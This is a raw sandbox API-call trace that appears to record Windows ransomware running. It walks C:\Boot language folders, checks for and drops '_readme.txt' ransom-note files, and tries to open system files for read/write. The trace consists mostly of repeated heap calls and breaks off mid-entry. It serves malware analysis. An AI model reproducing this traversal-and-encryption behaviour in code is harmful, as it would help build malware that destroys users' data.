returned 1 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.137] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.139] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0097.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.139] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.139] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.139] PathFindFileNameW (pszPath="") returned="" [0097.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.139] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.140] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.140] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0097.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.140] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b78ec8 [0097.141] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0097.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.141] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0097.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.141] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18cb460, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18cb460, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.141] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.141] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18cb460, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18cb460, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.141] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.141] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.142] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0097.142] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.142] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18cb460, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa18cb460, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18cb460, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.142] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned=".txt" [0097.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.142] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa18cb460, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa18cb460, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18cb460, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.142] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.142] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.142] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.142] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.142] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.143] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.143] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.144] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.144] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.145] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.145] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0097.145] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.145] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.145] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.145] PathFindFileNameW (pszPath="") returned="" [0097.146] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.146] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.146] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.146] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.146] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.147] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0097.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.147] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0097.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.147] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.147] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa18f15c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa18f15c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.147] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.147] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, 